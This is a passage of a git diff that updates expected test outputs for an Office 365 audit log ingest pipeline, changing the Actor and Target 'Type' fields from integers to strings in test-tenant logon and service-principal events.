 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -17088,27 +17088,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -17186,27 +17186,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "Office 365 Management APIs",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -17292,27 +17292,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -17390,27 +17390,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "Office 365 Management APIs",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -17496,27 +17496,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -17594,27 +17594,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "Office 365 Management APIs",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -17700,27 +17700,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -17798,27 +17798,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "Office 365 Management APIs",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -17904,27 +17904,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -18002,27 +18002,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "Office 365 Management APIs",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -18108,27 +18108,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -18206,27 +18206,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "Microsoft Graph",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "00000003-0000-0000-c000-000000000000",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -18312,27 +18312,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -18410,27 +18410,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "Microsoft Graph",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "00000003-0000-0000-c000-000000000000",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -18516,27 +18516,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -18614,27 +18614,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "Microsoft Graph",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "00000003-0000-0000-c000-000000000000",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -18720,27 +18720,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -18821,27 +18821,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "siem2",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -18927,27 +18927,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -19028,27 +19028,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "siem2",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -19134,27 +19134,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -19235,27 +19235,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "siem2",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -19341,27 +19341,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -19435,27 +19435,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "siem2",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -19541,27 +19541,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -19635,27 +19635,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "siem2",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -19741,27 +19741,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -19835,27 +19835,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "siem2",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json
index 2827cec97ef..ad1a01d1e5f 100644
--- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json
+++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json
@@ -39,15 +39,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -70,7 +70,7 @@
 "Target": [
 {
 "ID": "00000002-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -169,15 +169,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -200,7 +200,7 @@
 "Target": [
 {
 "ID": "00000003-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -299,15 +299,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -330,7 +330,7 @@
 "Target": [
 {
 "ID": "Unknown",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -429,15 +429,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -460,7 +460,7 @@
 "Target": [
 {
 "ID": "00000003-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -559,15 +559,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -590,7 +590,7 @@
 "Target": [
 {
 "ID": "Unknown",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -689,15 +689,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -720,7 +720,7 @@
 "Target": [
 {
 "ID": "5f09333a-842c-47da-a157-57da27fcbca5",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -819,15 +819,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -850,7 +850,7 @@
 "Target": [
 {
 "ID": "00000003-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -949,15 +949,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -980,7 +980,7 @@
 "Target": [
 {
 "ID": "Unknown",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1079,15 +1079,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1110,7 +1110,7 @@
 "Target": [
 {
 "ID": "Unknown",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1209,15 +1209,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1240,7 +1240,7 @@
 "Target": [
 {
 "ID": "Unknown",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1339,15 +1339,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
